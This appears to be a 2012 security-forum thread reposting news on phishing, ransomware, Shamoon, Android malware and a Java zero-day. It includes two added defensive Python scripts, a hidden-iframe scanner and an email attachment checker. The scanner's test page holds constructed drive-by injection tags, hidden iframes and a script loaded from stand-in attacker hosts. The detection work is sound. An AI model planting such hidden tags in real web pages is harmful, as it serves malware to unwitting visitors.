As a journalist, has some power to rectify issues.
-
***
Web Apps Under Attack One-Third Of The Time
Web applications are heavily targeted by hackers, most of whom see them as a useful point of vulnerability from which to access sensitive data that may travel over those apps.
... the average Web application can expect attacks 120 days per year, though some are actually being attacked more than twice that amount, or nearly 80 percent of the time.
The average attack, according to the study, has a duration of approximately 7 minutes and 42 seconds, with the longest attacks reaching 79 minutes.
Read more at :
http://www.crn.com/news/security/240005185/web-apps-under-attack-one-third-of-the-time.htm?cid=nl_crn
***
-
***
Phishing Scheme Targets ADP, Other Outsourced Payroll Firms
Outsourced payroll management services are reportedly being used as bogus sources in a series of phishing schemes that have been launched over the past few weeks.
According to a report by Internet Storm Center, "Few things are as juicy for the bad guys as getting a keylogger onto the computer of someone who manages payroll. HR/payroll employees tend to have access to personal data of staff and usually have some form of access to a well-stocked bank account that is used to pay the wages."
The report goes on to say that ADP is one of the targeted payroll services. As part of the attack, customers apparently get an email indicating that their digital certificate that enables access to the system is about to expire. A link is then provided through which the certificate can presumably be renewed, but that link actually redirects them to what is believed to be a rented Linux server, through which all forms of malfeasance can occur.
Read more at :
http://www.crn.com/news/security/240005200/phishing-scheme-targets-adp-other-outsourced-payroll-firms.htm?cid=nl_crn
***
-
***
Apple iCloud Hack Raises Concerns Over Cloud Security
The hack into a Gizmodo writer’s Amazon and Apple accounts over the weekend is being used as a cautionary tale for consumers, a call to action for cloud providers regarding security policies and a sounding board for concerns about the rush to the cloud.
In a lengthy first-person account in Wired magazine, writer Mat Honan outlines how an attacker quickly found his way into Honan’s iCloud account and wiped everything from his Mac, iPhone and iPad, all of which were linked to Apple’s cloud service. The attacker also hacked into his Twitter and Gmail accounts. In the story, Honan admonishes himself for failing to follow basic security protocol—his online accounts were linked together, and he had failed to back up his data, for example.
However, the larger concern was how quickly and easily the attacker—who called himself “Phobia”—was able to gain control of Honan’s Apple iCloud account through just a couple of phone calls to Amazon and Apple, convincing customer service representatives at both places that he was Honan. The attack was less about hacking into the accounts via a computer and more about social engineering that gleans the necessary personal information from Amazon and Apple.
It gets worse. Read more at :
http://www.eweek.com/c/a/Security/Apple-iCloud-Hack-Raises-Concerns-Over-Cloud-Security-609440/?kc=EWKNLEDP08092012D
***
-
***
Businesses at Risk When Moving Sensitive Data to Cloud Storage
However, businesses have a ways to go when it comes to understanding how to protect that critical data and whose responsibility it is, the study, entitled "Encryption in the Cloud," found.
About half the respondents said their organizations currently transfer sensitive or confidential data to the cloud. Of those, 64 percent believe the cloud provider has primary responsibility for protecting that data, but nearly two-thirds of respondents say they do not know what cloud providers are actually doing to protect the sensitive or confidential data entrusted to them.
Thirty-six percent of respondents say their organization has primary responsibility for managing the keys, while 22 percent said the cloud provider has primary responsibility for encryption key management. The study showed that even in cases where encryption is performed inside the enterprise, more than half of the respondents hand over control of the keys to the cloud provider.
The study showed an almost even split between respondents who say their organization applies persistent encryption to data before it is transferred to the cloud provider and those who say they rely on encryption that is applied within the cloud environment. Another one-third of respondents said their organizations are very likely to transfer sensitive or confidential data to the cloud within the next two years, suggesting the risks of a breach will increase as more companies jump on the cloud storage bandwagon.
Read more at :
http://www.eweek.com/c/a/Data-Storage/Businesses-at-Risk-When-Moving-Sensitive-Data-to-Cloud-Storage-708368/?kc=EWKNLEDP08092012E
***
-
***
Online accounts for Blizzard video games hacked
From Associated Press
August 10, 2012 11:16 AM EDT
IRVINE, Calif. (AP) — The maker of video games such as "Diablo" and "World of Warcraft" is warning players that hackers have gained unauthorized access to some online accounts.
Blizzard Entertainment says it has no evidence that the intruders acquired credit card information, billing addresses or players' names.
But hackers were able to access other data, including email addresses and answers to players' personal security questions. Blizzard says it doesn't believe such information alone is enough for anyone to gain access to its Battle.Net online accounts, which let people play with others around the world online.
The company also says hackers took encrypted versions of passwords. As a precaution, it's recommending that players change their passwords.
Blizzard, which is a division of Activision Blizzard Inc., didn't say how many accounts were affected.
***
-
***
Google fined $22.5M for latest privacy breakdown
MICHAEL LIEDTKE
From Associated Press
August 09, 2012 5:31 PM EDT
SAN FRANCISCO (AP) - Google is paying a $22.5 million fine to settle the latest regulatory case questioning the Internet search leader's respect for people's privacy and the integrity of its internal controls.
The penalty announced Thursday by the Federal Trade Commission matches the figure reported by The Associated Press and other media outlets last month. It's the most that the FTC has ever fined a company for a civil violation.
The rebuke resolves the FTC's allegations that Google Inc. duped millions of Web surfers who use Apple Inc.'s Safari browser.
Google had assured people that it wouldn't monitor their online activities, as long as they didn't change the browser settings to permit the tracking.
Google broke that promise, according to the FTC, by creating a technological loophole that enabled the company's DoubleClick advertising network to shadow unwitting Safari users. That tracking gave DoubleClick a better handle on what kinds of marketing pitches to show them.
The FTC concluded that the contradiction between Google's stealth tracking and its privacy assurances to Safari users violated a vow that the company made in another settlement with the agency in October.
Read more at :
http://my.earthlink.net/article/tec?guid=20120809/d30b4b70-de77-4b3f-8d6f-b4a445fc708c
***
-
***
FTC finalizes privacy settlement with Facebook
ANICK JESDANUN
From Associated Press
August 10, 2012 4:22 PM EDT
NEW YORK (AP) — The Federal Trade Commission voted Friday to finalize its settlement with Facebook, resolving charges that the social network exposed details about users' lives without getting the required legal consent.
Facebook Inc. agreed to submit to government audits of its privacy practices every other year for the next two decades. The company also committed to getting explicit approval from users before changing the types of content it makes public.
Both Facebook and Google have vast amounts of data on their users — Facebook through the things people share on the site, and Google through the searches and other things people do. Such information is valuable because it can be used to improve the lucrative targeted advertising pitches that both companies aim at users.
Over the years, Facebook has been pushing users to voluntarily share more about themselves. That ultimately encourages users and their friends to spend more time on the site, which in turn allows Facebook to sell more ads. Although Facebook boasts that it gives users a variety of software settings so they can decide which photos, links and updates to share with whom, the company changes those options on a regular basis.
Much of the FTC's complaint against Facebook centers on a series of changes that the company made to its privacy controls in late 2009. The revisions automatically shared information and pictures about Facebook users, even if they previously programmed their privacy settings to shield the content. Among other things, people's profile pictures, lists of online friends and political views were suddenly available for the world to see, the FTC alleged.
The complaint also charges that Facebook shared its users' personal information with third-party advertisers from September 2008 through May 2010 despite several public assurances from company officials that it wasn't passing the data along for marketing purposes.
Read more at :
http://my.earthlink.net/article/tec?guid=20120810/e3c65177-ca7a-4478-99a3-befe2f9564f9
***
-
Google forced to temporarily deactivate copy protection for Android apps
http://www.h-online.com/security/news/item/Google-forced-to-temporarily-deactivate-copy-protection-for-Android-apps-1661755.html
-
Oracle releases unscheduled fix for critical vulnerability
http://www.h-online.com/security/news/item/Oracle-releases-unscheduled-fix-for-critical-vulnerability-1666898.html
-
***
FTC accuses Facebook of misleading developers over security
An investigation by the U.S. Federal Trade Commission (FTC) has suggested that the social networking site fell short in reviewing and verifying applications, and therefore "deceived" developers over security ratings.
When developers passed along an application into the now-closed verified apps scheme, it is reported that the social networking site was paid up to $95,000 in order to give software green 'ticks' of approval. By doing so, individual applications were given a "test for trustworthy user experiences" by Facebook.
However, an in-depth investigation into Facebook's practices, conducted by Commissioners Jon Leibowitz, J. Thomas Rosch, Edith Ramirez and Julie Brill, has found that the social networking giant did not take the steps to review applications that it promoted.
According to the FTC's report, under the title "Facebook's deceptive verified apps program", the program which ran from approximately May 2009 to December 2009 awarded 254 applications a green 'verified' badge.
Read more at :
http://www.zdnet.com/ftc-accuses-facebook-of-misleading-developers-over-security-7000002528/
***
-
***
Do Not Track: has Microsoft outwitted competitors Google and Facebook?
With a deft side step, Microsoft appears to have outflanked Do Not Track opponents, like Google and Facebook who depend on tracking for their advertising.
In a recent Microsoft blog post, Chief Privacy Officer Brendon Lynch explained how IE10 would handle Do Not Track preferences:
DNT will be enabled in the "Express Settings" portion of the Windows 8 set-up experience. There, customers will also be given a “Customize” option, allowing them to easily switch DNT "off" if they'd like.
In this apparently innocuous 'clarification', he also writes that this will benefit all users: they will enjoy the best privacy settings by default while having alternative options within easy reach.
Read more at :
http://nakedsecurity.sophos.com/2012/08/14/do-not-track-has-microsoft-outwitted-competitors-google-and-facebook/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
-
***
Google to drop search rankings of sites with many takedown notices
EFF says Google needs to be clearer on new criteria, which take effect Monday
In a Friday morning blog post, Google said it will change its search algorithm next week to take into account “the number of valid copyright removal notices” it receives for any site. High rates of removal notices are likely to drop a site down in the search results, which Google says “should help users find legitimate, quality sources of content more easily.”
The new move appears to be a nod in the direction of rightsholders, most notably the MPAA and RIAA. The latter trade group, meanwhile, has argued previously that Google isn’t doing enough to remove possibly infringing links.
On its website, the RIAA called the new move a "potentially significant announcement."
Read more at :
http://arstechnica.com/tech-policy/2012/08/google-to-drop-search-rankings-of-sites-with-many-takedown-notices/
***
-
***
Anonymous reaches out on IRC for Mars Curiosity hacking aid
It seems impossible, but apparently it's not. The hacker group Anonymous is attempting to spread its hacking activity all the way off of Earth and to the Red Planet, Mars.
A message on Internet Relay Chat (IRC) would seem to be a solicitation for aid in hacking NASA's Mars Science Laboratory (MSL) mission, which saw its rover component, named Curiosity, land earlier this week.
Flashpoint Partners, a New York-based cybersecurity firm, spotted the following message by user "MarsCuriosity" on the AnonOps IRC channel on Thursday:
"MarsCuriosity: Anyone in Madrid, Spain or Canbarra who can help isolate the huge control signal used for the Mars Odyssey / Curiosity system please? The cypher and hopping is a standard mode, just need base frequency and recordings/feed of the huge signal going out. (yes we can spoof it both directions!)"
Read more at :
http://www.examiner.com/article/anoynmous-reaches-out-on-irc-for-mars-curiosity-hacking-aid
***
-
***
Improving the Security of your WordPress Blog
WordPress powered websites are often a target for hackers. Here are some of the best security plugins and tips to better protect your WordPress blog.
About a month ago, this WordPress blog was hacked. And since my other websites like ctrlq.org and hundredzeros.com are hosted on the same web server, the hacker successfully managed to wipe off all these sites from the Internet as well.
The web hosting company says that it could have happened because one of the sites was running an older version of WordPress. The passwords weren’t compromised though as all the login activity happened from known IP addresses. It was a tough period but fortunately, the deleted sites have been restored and the traffic is also back to normal.
Here’s a list of changes I have done to improve the security of my WordPress blogs though the perpetual worry that such a thing can happen again will remain.
For those of you using WordPress, read more at :
http://www.labnol.org/internet/improve-wordpress-security/24639/
***
-
Google warns of using Adobe Reader - particularly on Linux
http://www.h-online.com/security/news/item/Google-warns-of-using-Adobe-Reader-particularly-on-Linux-1668153.html
-
***
Shamoon the Wiper - Copycats at Work
Earlier today, we received an interesting collection of samples from colleagues at another anti-malware company. The samples are especially interesting because they contain a module with the following string:
C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb
Of course, the “wiper” reference immediately reminds us of the Iranian computer-wiping incidents from April 2012 that led to the discovery of Flame.
The malware is a 900KB PE file that contains a number of encrypted resources. The malware appears to be collecting information about “interesting” files on the infected system.
It is more likely that this is a copycat, the work of script kiddies inspired by the story.
We detect the 32 bit components of the malware as Trojan.Win32.EraseMBR.a. The 64 bit component is detected as Trojan.Win64.EraseMBR.a. At the moment of discovery, the main dropper was detected by heuristics as "HEUR:Trojan.Win32.Generic".
See & read more at :
https://www.securelist.com/en/blog/208193786/Shamoon_the_Wiper_Copycats_at_Work
***
-
***
MyAgent Trojan Targets Key Technology-Related Industries
Security experts are analyzing a targeted trojan that leverages emailed PDF files to gain access to systems and deliver its payload to specified networks in the aerospace, chemical, defense and tech industries.
According to researchers at the FireEye Malware Intelligence Lab, the MyAgent trojan masks its payload as a zipped health insurance policy, but then downloads a second file entitled, "ABODE32.exe," which may have had its name derived from PDF originator Adobe (NSDQ:ADBE)’s, into the temp directory. The executable then accesses Windows Protected Storage where passwords for Internet Explorer, Outlook and additional applications are kept, and it begins uploading data to command-and-control servers. Symptoms of infection include the loading of various DLLs, which are believed to be used to support communication with C&C servers.
The malware also uses JavaScript to assess which version of Adobe Reader is currently running on the host machine, and then executes attacks based on known vulnerabilities in the discovered version.
Read more at :
http://www.crn.com/news/security/240005702/myagent-trojan-targets-key-technology-related-industries.htm?cid=crnbuzz
***
-
***
Invisible iFrame drive-by malware attacks explained
iFrames and script tags are being used by malicious hackers to serve up drive-by internet attacks, silently and invisibly.
iFrames allow webmasters to embed the content of one webpage into another, seamlessly.
There are legitimate reasons why some websites may want to do that - but what cybercriminals do is exploit the functionality (presumably they have been able to gain write access to the website) to deliver malware such as fake anti-virus or a PDF vulnerability exploit to infect your computer.
What's sneaky is that malicious hackers can make the embedded content invisible to the naked eye, by making the window zero by zero pixels in size. You can't see the threat, but your web browser is still dragging it down.
See & read more at :
http://nakedsecurity.sophos.com/2012/08/16/invisible-iframe-drive-by-malware-attacks-explained-video/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=twitter&utm_source=twitterfeed
***
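A detector for the trick the Sophos piece describes, as an added example (my code, not Sophos's): it parses a page with the standard library HTML parser and reports iframes that are sized 0x0 or hidden by inline style, plus script tags loaded from a host other than the page's own, which is what a webmaster checking a possibly tampered site would want to grep for. The sample page and the addresses in it are constructed (RFC 5737 documentation ranges); the script-tag finding is marked for review only, because legitimate CDNs also load from third-party hosts.

```python
"""Flag invisible iframes and third-party script tags in an HTML document.

Added example; SAMPLE_PAGE is constructed and does not come from any real site.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Inline-style patterns that make an element invisible even at a normal size.
HIDDEN_STYLE = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.I)
ZERO_DIMENSION = re.compile(r"(width|height)\s*:\s*0(px)?(\s|;|$)", re.I)


def _px(value: Optional[str]) -> Optional[int]:
    """Parse a width/height attribute such as '0', '0px' or '600' into an int."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def _why_hidden(attrs: Dict[str, Optional[str]]) -> Optional[str]:
    """Return a reason string when the element would be invisible to the viewer."""
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if w is not None and h is not None and w <= 1 and h <= 1:
        return "size %dx%d" % (w, h)
    style = attrs.get("style") or ""
    if HIDDEN_STYLE.search(style):
        return "hidden by style"
    m = ZERO_DIMENSION.search(style)
    if m:
        return "zero %s in style" % m.group(1).lower()
    if "hidden" in attrs:
        return "hidden attribute"
    return None


class HiddenContentScanner(HTMLParser):
    """Collects suspicious <iframe> and <script src> start tags while parsing."""

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = {name.lower(): value for name, value in attrs}
        if tag == "iframe":
            reason = _why_hidden(a)
            if reason:
                self.findings.append({"tag": "iframe", "severity": "high",
                                      "src": a.get("src") or "", "reason": reason})
        elif tag == "script" and a.get("src"):
            host = (urlparse(a["src"]).hostname or "").lower()
            # Relative URLs have no host and are served by the site itself.
            if host and host != self.page_host:
                self.findings.append({"tag": "script", "severity": "review",
                                      "src": a["src"], "reason": "third-party host %s" % host})


def scan_html(html: str, page_host: str) -> List[Dict[str, str]]:
    """Scan one document; page_host is the site's own hostname."""
    scanner = HiddenContentScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: one normal embed, two hidden iframes, one local and one foreign script.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://maps.example.org/embed" width="600" height="400"></iframe>
<iframe src="http://198.51.100.23/in.php" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://203.0.113.8/x.html" style="visibility:hidden; position:absolute"></iframe>
<script src="/js/site.js"></script>
<script src="http://198.51.100.23/a.js"></script>
</body></html>"""


def scan_sample() -> List[Dict[str, str]]:
    return scan_html(SAMPLE_PAGE, "www.example.org")


if __name__ == "__main__":
    for f in scan_sample():
        print("%-6s %-7s %s  (%s)" % (f["severity"], f["tag"], f["src"], f["reason"]))
```

Run it over a saved copy of each page after a suspected compromise, or periodically from a cron job; a hidden iframe pointing at a host you do not recognise is the signature the article is talking about, while the third-party script list needs a human to compare against the scripts the site is supposed to load.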
-
***
NSS Labs expose inadequate AV products
NSS Labs testing showed that 9 of 13 popular consumer anti-virus products tested failed to provide adequate protection against exploits targeting two recent critical Microsoft vulnerabilities.
Only 4 vendors – Avast, Kaspersky, McAfee and Trend Micro – successfully blocked all attacks delivered over both HTTP and HTTPS.
“This test revealed that numerous vendors that protected against an exploit over HTTP failed to protect against the same exploit delivered via HTTPS,” said Bob Walder, Chief Research Officer at NSS Labs. "Vendors who did not perform well might want to reconsider their default settings in this age of attacks against SSL and other protocols.”
Read more at :
http://www.net-security.org/malware_news.php?id=2224
***
-
***
MyAgent Trojan Targets Key Technology-Related Industries
Security experts are analyzing a targeted trojan that leverages emailed PDF files to gain access to systems and deliver its payload to specified networks in the aerospace, chemical, defense and tech industries.
The malware also uses JavaScript to assess which version of Adobe Reader is currently running on the host machine, and then executes attacks based on known vulnerabilities in the discovered version.
Another good reason to not use Adobe Reader but use some other PDF reader.
Read more at :
http://www.crn.com/news/security/240005702/myagent-trojan-targets-key-technology-related-industries.htm?cid=nl_crn
***
-
***
FBI warns of Internet malware that locks computers, demands money
Aug 17, 2012 (Bangor Daily News - McClatchy-Tribune Information Services via COMTEX) -- The Federal Bureau of Investigation's Boston Division issued a warning Thursday about a new Internet virus that locks computers and carries a fake message purportedly from the FBI requesting payment to unlock the computer.
In the alert, the FBI's Boston Division -- which covers Rhode Island, Maine, New Hampshire and Massachusetts -- said it has received an increasing number of reports from individuals who have fallen victim to the scam.
Though she declined to provide numbers, FBI spokeswoman Katherine Gulotta said that about 15 percent of all of the computer complaint calls the FBI has received in the Boston Division have been attributed to the Reveton virus. Of those, 10 percent came from Maine, she said. Reveton has been identified as "drive-by" malicious software, or malware, because unlike many viruses, which activate when users open a file or attachment, this one can install itself when users simply click on a compromised website.
Once infected, the victim's computer immediately locks and the monitor displays a screen stating that there has been a violation of federal law. The fraudulent message goes on to say the user's Internet address has been identified by the FBI or the Department of Justice's Computer Crime and Intellectual Property Section as having visited child pornography sites and other illegal content, Gulotta said Thursday.
To unlock their machines, users are told to pay a fine to the U.S. Department of Justice using a prepaid money card service. Gulotta said that the amounts demanded vary but are in the $200 range. In addition to the "ransomware," the FBI said, the malware continues to operate on the compromised computer and can be used to commit online banking and credit card fraud.
Read more at :
http://it.tmcnet.com/news/2012/08/17/6515717.htm
***
-
***
FBI warns of child porn scam
The FBI is warning computer users about a new scam that not only takes your money, but accuses you of visiting child pornography websites as well.
"They're getting more boisterous," said Troy Rice, an IT expert. "They're trying to really intimidate the average user."
The trouble begins when you click an unfamiliar link. Hackers download a virus to your computer, and you see a screen telling you that you're in trouble with the FBI for looking at child pornography. Then it demands you pay a $100 fine to the Department of Justice.
"And the scariest thing is it's probably not just the 100 bucks. You've now given them a credit card, and you've given them proprietary information, personal information, so once they have that it's even more detrimental," said Rice.
If your computer is compromised, try to run a virus scan. If you can't get rid of the problem, have your computer professionally cleaned.
The best way to prevent the attack is to be careful what you click on. If you're casually surfing the web, clicking from one link to another, experts say it's only a matter of time before you run into trouble.
If you're a victim of online fraud, report it to the FBI at www.IC3.gov.
See & read more at :
http://www.tucsonnewsnow.com/story/19300728/fbi-warns-of-child-porn-scam
***
-
Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
tested against CVE-2012-1875 and CVE-2012-1889. only 4 of 13 tested got 100% ...... read and see who
pdf.doc
http://www.nsslabs.com/assets/noreg-reports/2012/Can%20Consumer%20AV%20Products%20Protect.pdf
-
Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
Related post in blog: https://blog.avast.com/2012/08/17/avast-one-of-few-to-protect-against-microsoft-vulnerabilities/
-
Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
Note the following quote from the pdf; page 6: En garde Once an endpoint defense mechanism has been bypassed, the next step taken by most attackers is to attempt disable it completely. This would, for example, enable further malicious software to be downloaded without risk of it being detected by the protection mechanism.
There are significant differences in the ability of market-leading products to defend themselves against being disabled. Unfortunately both Microsoft and CA offerings presented virtually no defensive capabilities. Both products could be disabled with a simple "kill" command.
Quote taken directly from Page 6 of pdf. link provided by Pondus.
Whoa! One would think Microsoft would at least have measures in place to prevent their product from being disabled so easily.
I had Norton Antivirus back a few years ago (more than ten years ago) fail to protect in a similar situation. Was very tough to recover from, as uninstalling and reinstalling would not work. I did eventually get it to run again, but.... self-defense should be a basic protection for all antiviruses, so users should be aware of this flaw and lack of necessary protection.
-
another type of scam......
SEC Shuts Down $600 Million Online Pyramid and Ponzi Scheme
http://www.sec.gov/news/press/2012/2012-160.htm
-
***
Own the Email, Own the Person
A must read for all email users, especially those with accounts linked with Facebook, & others.
For attackers looking to take control of a victim's online presence, there is no better place to start than the target's email account. If you own the email, you own the person. That's never been more true than today, with so many social networks, services and shopping sites attached to users' email addresses. New research done by Cesar Cerrudo of IOActive shows just how simple it can be to get control of a target's email account, and from there, everything else.
For many people, their personal email account is where they store their lives. Bank statements, bills, personal correspondence, work files, anything you can get in electronic form can often be found in a given target's email inbox. And a large number of email systems protect users' inboxes with nothing more complicated than a simple password. Gmail is one notable exception, with its two-factor authentication option that enables users to employ a mobile app to generate one-time codes that they use in addition to their passwords. But, that's an option and not mandatory, and for many users just looks like an annoyance on the way to getting their email.
Please read more at :
http://threatpost.com/en_us/blogs/own-email-own-person-082012
***
-
***
SMSZombie Malware Infecting Android Devices, Stealing Money
A nasty new piece of malware that has the ability to steal money from users via fraudulent SMS payments has shown up in a Chinese Android market and researchers say it's infected more than 500,000 victims. The SMSZombie malware is being hidden inside apps on the app market and once it's on a device it has the ability to prevent users from uninstalling it.
"The SMSZombie virus has been hidden in a variety of wallpaper apps and attracts users with provocative titles and pictures. When the user sets the app as the device’s wallpaper, the app will request the user to install additional files associated with the virus. If the user agrees, the virus payload is delivered within a file called 'Android System Service',"
Read more at :
http://threatpost.com/en_us/blogs/smszombie-malware-infecting-android-devices-stealing-money-082012
***
-
***
Royal Mail malware attack distributed via email
It's wise to be wary when it comes to unsolicited email, even when the email appears to come from a legitimate organisation.
Today we're warning internet users to be careful not to be tricked into opening attachments that have been spammed out, posing as communication from the British Royal Mail.
It should go without saying that the emails are not connected with the real Royal Mail in any way, despite them appearing to arrive from noreply@royalmail.com and containing the Royal Mail's logo.
The cybercriminals who have distributed the attack are hoping that your curiosity will be piqued, and you will be tempted to open the attached ZIP file in the mistaken belief that a parcel is winging its way to you.
See & read more at :
http://nakedsecurity.sophos.com/2012/08/20/royal-mail-malware/?utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29&utm_medium=feed&utm_source=feedburner
***
-
You really would have to be gullible to fall for this and many other scams. How in hells bells would they know your email. Not to mention, in this case the Royal Mail is going to hell in a hand basket. Its level of service is getting worse not better so I couldn't see them even offering this service.
Whilst they have a tracking service they certainly don't have an email notification service, the sender would have to know your email, no doubt this would be a premium service which no doubt you the user would be paying for (so you should know and expect it). How would it even work if they had when they really haven't a clue when your parcel might arrive.
It doesn't take much rational thought to see through these scams.
-
Hi DavidR,
I also always think: "Oh my great grandfathers, how can people fall for these messages, and take this message seriously".
But there are always those who will take the bait. A lot of humans react irrationally and then the rational thinking sets in a fraction too late.
If that wasn't the case this would have stopped a long, long time ago. It is always better to think first and then decide not to click, than to click first and come to realize later what you have done,
polonus
-
***
These email scams happen thousands of times each day, and, there are thousands of new gullible sheep getting on-line each day.
90% of these new gullible sheep do not even think anyway.
***
-
***
Citibank victimized by hackers, insists cardholders are safe
Reuters is reporting that Citibank's systems were hacked, resulting in a loss of Personally Identifiable Information (PII).
Citibank says that data for 1% of their cardholders was accessed through this breach, but customers' Social Security Numbers (SSNs), birth dates, card expiration dates and CVV codes are safe.
Information that may have been disclosed to the hackers includes customers' names, account numbers, contact details and email addresses.
According to Citibank's website they are the world's largest provider of credit cards, issuing more than 150,000,000 cards globally. Based on these numbers, information for 1,500,000 or more individuals may have been compromised.
Read more at :
http://nakedsecurity.sophos.com/2011/06/09/citibank-victimized-by-hackers-insists-cardholders-are-safe/
***
-
These email scams happen thousands of times each day, and, there are thousands of new gullible sheep getting on-line each day.
90% of these new gullible sheep do not even think anyway.
These scams are frequent and the only thing that changes is the so called hook, social engineering to hook the inquisitive fools.
-
Hi DavidR,
There is a good English proverb for this attitude "Curiosity killed the proverbial animal."
It rarely lands on all fours...as it walks on two...
polonus
-
Or another "there is one born every minute" and they aren't just talking about babies, but fools.
-
Interesting, I have just received one of the Royal Mail ones; it is worse, the email isn't even personally sent to me, what an absolute joke.
Anyone falling for this really needs their head examined.
I have a rudimentary spam filter: if it isn't for me it gets flagged as 'Not to me', couldn't be simpler. Email source and headers are also a dead giveaway. Even the attachment is a zip file, so the fool would have to open that, extract the contents and then run the file extracted.
Life is even easier if I just believe my MailWasher anti-spam with a spam score of -405 with the various filters detecting it as spam.
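The two tells DavidR relies on above, a message that is not addressed to you and a ZIP that contains an executable, are easy to automate. The following is an added example (not the poster's MailWasher setup or any forum member's code) using only the Python standard library; the message it scores is constructed to resemble the lure described and the addresses are placeholders.

```python
"""'Not to me' rule plus a look inside ZIP attachments for executables.

Added example, not code from this thread. The sample message is
constructed; MY_ADDRESSES and all addresses used are placeholders.
"""
import io
import zipfile
from email.message import EmailMessage
from email.utils import getaddresses

MY_ADDRESSES = {"me@example.com"}  # assumption: the recipient's own mailboxes
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs")


def not_to_me(msg, my_addresses=MY_ADDRESSES):
    """True if none of our addresses appears in To or Cc (the 'Not to me' rule)."""
    raw = [str(h) for h in msg.get_all("To", []) + msg.get_all("Cc", [])]
    recipients = {addr.lower() for _, addr in getaddresses(raw) if addr}
    return not (recipients & {a.lower() for a in my_addresses})


def executables_in_zip_attachments(msg):
    """Return 'attachment:member' for each executable found inside a ZIP attachment."""
    found = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not name.endswith(".zip"):
            continue
        try:
            with zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))) as zf:
                for member in zf.namelist():
                    if member.lower().endswith(EXEC_EXTENSIONS):
                        found.append(f"{name}:{member}")
        except zipfile.BadZipFile:
            found.append(f"{name}:<corrupt zip>")  # still worth a look
    return found


def score(msg):
    """Collect the reasons this message deserves a 'spam' flag."""
    reasons = []
    if not_to_me(msg):
        reasons.append("Not to me")
    for item in executables_in_zip_attachments(msg):
        reasons.append(f"executable in attachment {item}")
    return reasons


def build_sample():
    """Constructed lure: spoofed sender, generic To, ZIP hiding an .exe."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Royal_Mail_Parcel_Notice.exe", b"MZ placeholder, not a real program")
    msg = EmailMessage()
    msg["From"] = "Royal Mail <noreply@royalmail.com>"
    msg["To"] = "customer@mail.example"  # not one of MY_ADDRESSES
    msg["Subject"] = "Royal Mail delivery notification"
    msg.set_content("Your parcel could not be delivered. See attached notice.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename="Parcel_Notice.zip")
    return msg


def build_legit():
    """Constructed plain message addressed to us, no attachments."""
    msg = EmailMessage()
    msg["From"] = "friend@example.org"
    msg["To"] = "me@example.com"
    msg["Subject"] = "lunch?"
    msg.set_content("Are you free on Friday?")
    return msg


if __name__ == "__main__":
    for reason in score(build_sample()):
        print(reason)
```

Feed it a real message with `email.message_from_bytes(data, policy=email.policy.default)`. Bcc delivery and mailing lists will also trip the 'Not to me' rule, which is exactly why the post treats it as a flag rather than a verdict; the ZIP check is the stronger signal.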
-
Shamoon virus was announced on 16 August 2012.
The virus has been noted as unique for having differing behaviour from other malware cyber espionage attacks. Shamoon is capable of spreading to other computers on the network, including those disconnected from the internet. Once a system is infected, the virus continues to compile a list of files from specific locations on the system, erase and then send information about these files back to the attacker. Finally, the virus will overwrite the master boot record of the system to prevent it from booting.
http://en.wikipedia.org/wiki/Shamoon
-
Multi-platform trojan also gets on to virtual machines: http://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines
polonus
-
***
'Anonymous' Targets British Websites In Support Of Assange
The British Ministry of Justice has confirmed that it's investigating issues with its website that are reportedly part of an attack by the "Anonymous" group of hackers in support of WikiLeaks founder Julian Assange, who is under governmental protection in the Ecuadorian London embassy to avoid extradition to Sweden over alleged sexual misconduct.
The website of the British Department of Work and Pensions is believed to be similarly affected.
Anonymous has issued a statement indicating that it has launched a number of distributed denial-of-service (DDoS) attacks against the government of the United Kingdom. And, while the Ministry of Justice has acknowledged some level of disruption, it claims that the only issues thus far have been intermittent service interruptions. Other reports suggest that the attacks have been more successful than the British government has admitted.
Read more at :
http://www.crn.com/news/security/240005952/anonymous-targets-british-websites-in-support-of-assange.htm?cid=nl_crn
***
-
Are your personal data secure at Tesco's?
See: http://www.troyhunt.com/2012/07/lessons-in-website-security-anti.html#more article by Troy Hunt on Troy Hunt's Blog - see: http://www.computing.co.uk/ctg/news/2199618/ico-to-check-out-tescocom-security#ixzz245h3mfnc article author = Graeme Burton
polonus
-
Website owners should watch out for Fake JQuery Website Serving Redirection Malware: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html (Sucuri blog article author = dre armeda) Check your website for it here: http://sitecheck.sucuri.net/
polonus
-
McAfee splats bug that knocked punters offline
The internet? Oh no, far too dangerous for you to go alone ;D
http://www.theregister.co.uk/2012/08/23/mcafee_net_cutoff_bug/
-
Zero-Day Season is Not Over Yet
http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
http://forum.avast.com/index.php?msg=832984
-
Hi Asyn,
That is why users are advised not to use Java until the patch for the zero-day becomes available. Has been added to Metasploit: https://community.rapid7.com/community/metasploit/blog/2012/08/27/lets-start-the-week-with-a-new-java-0day (posted by sinn3)
and is actively being used in a new variant of Poison Ivy (reported by AlienVault's Jaime Blasco)
polonus
-
***
More on the above Java problem :
